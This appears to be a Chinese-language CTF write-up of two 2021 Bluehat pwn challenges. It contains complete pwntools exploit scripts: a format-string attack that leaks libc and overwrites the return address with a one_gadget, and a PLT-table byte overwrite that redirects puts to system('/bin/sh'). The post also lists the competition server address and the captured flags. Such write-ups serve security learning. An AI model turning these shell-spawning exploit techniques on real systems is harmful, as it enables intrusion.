2021 bluehat-s wp
好久沒發過博客了,難得想起這個事情,適逢昨天剛打完比賽,👴就順手發一篇吧
pwn
早上九點開賽,大概11點左右就ak了pwn(就兩道pwn),然后都是在摸魚了
附件傳到百度網盤了,有興趣的師傅可以下載來玩一下
鏈接: https://pan.baidu.com/s/1RLpfC0LEGPJkKif8COnNpg 密碼: eq90
hangman
程序大致邏輯是,先輸入一段字符串,隨后輸入字符,統計字符串中與該字符相等的字符數目,並將數目累加到局部變量上,當局部變量與字符串長度相等時,會贏得一輪游戲,並且存在一個格式化字符串漏洞,利用該漏洞泄漏libc基地址,棧地址,改寫存放libc_start_main+240的位置,將_libc_start_main+240改成one_gadget,然后正常結束程序即可getshell 腳本有時不能打通,運行多幾次即可
exp
from pwn import*
import sys
binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 33445
ip = '118.190.62.234'
port = 33445
if sys.argv[1] == 'r':
p = remote(ip,port)
libc = ELF('./libc-2.23.so')
else :
p = process(binary)
libc = elf.libc
context.os = 'linux'
#context.log_level = 'debug'
context.arch = 'amd64'
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
def pwn():
# gdb.attach(p,'b * ($rebase)(0x13C5)')
sla('word:','%29$ppp%24$p')
sla('letter:','p')
sla('letter:','p')
sla('letter:','p')
ru('0x')
leak = rc(12)
lbase = int(leak,16)- 240 -libc.sym['__libc_start_main'] # __libc_start_main+240
ss('LIBC:'+hex(lbase))
ru('0x')
leak = rc(12)
main_ret = int(leak,16)+8
ss('main_ret:'+hex(main_ret))
one_gadget = 0x45226+lbase
ss('one_gadget:'+hex(one_gadget))
o1 = one_gadget & 0xffff
o2 = (one_gadget>>16) & 0xffff
o3 = (one_gadget>>32) & 0xffff
ss('o1:'+hex(o1))
ss('o2:'+hex(o2))
ss('o3:'+hex(o3))
payload = '%{0}c%15$hn'.format(o1)
payload = payload.ljust(14,'n') # len = 14
payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
payload = payload.encode()
payload += p64(main_ret)
sla('word:',payload)
sla('letter:','a')
sla('letter:','a')
sla('letter:','a')
payload = '%{0}c%15$hn'.format(o2)
payload = payload.ljust(14,'n') # len = 14
payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
payload = payload.encode()
payload += p64(main_ret+2)
sla('word:',payload)
sla('letter:','a')
sla('letter:','a')
sla('letter:','a')
sla('word:','a')
sla('letter:','a')
irt()
if __name__ == '__main__':
pwn()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
flag
flag{4e20e122-d87d-452e-b7ee-b88f5acf890f}
cover
程序開始讀入5字節,前4字節為地址,可以將最后一字節,寫入該地址中,程序最后會讀入一段輸入,並執行puts輸出,攻擊思路就是修改puts的plt表中的跳轉代碼,在跳轉到got表時,程序會push一個偏移,只需將puts的偏移修改為system的偏移,既可劫持puts的plt表跳轉到system,執行system('/bin/sh')
exp
from pwn import*
import sys
binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 12435
ip = '118.190.62.234'
port = 12435
if sys.argv[1] == 'r':
p = remote(ip,port)
# libc = ELF('./libc.so.6')
else :
p = process(binary)
libc = elf.libc
context.os = 'linux'
context.log_level = 'debug'
context.arch = 'amd64'
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
# 0x080484D0 puts_got 0x80484dc \x80
def pwn():
sa('this','\xd7\x84\x04\x08\x30')
sleep(2)
sd('/bin/sh\x00')
irt()
if __name__ == '__main__':
pwn()
flag
flag{f7d89ad6-8c5a-4f0d-ae41-2410ab8855b6}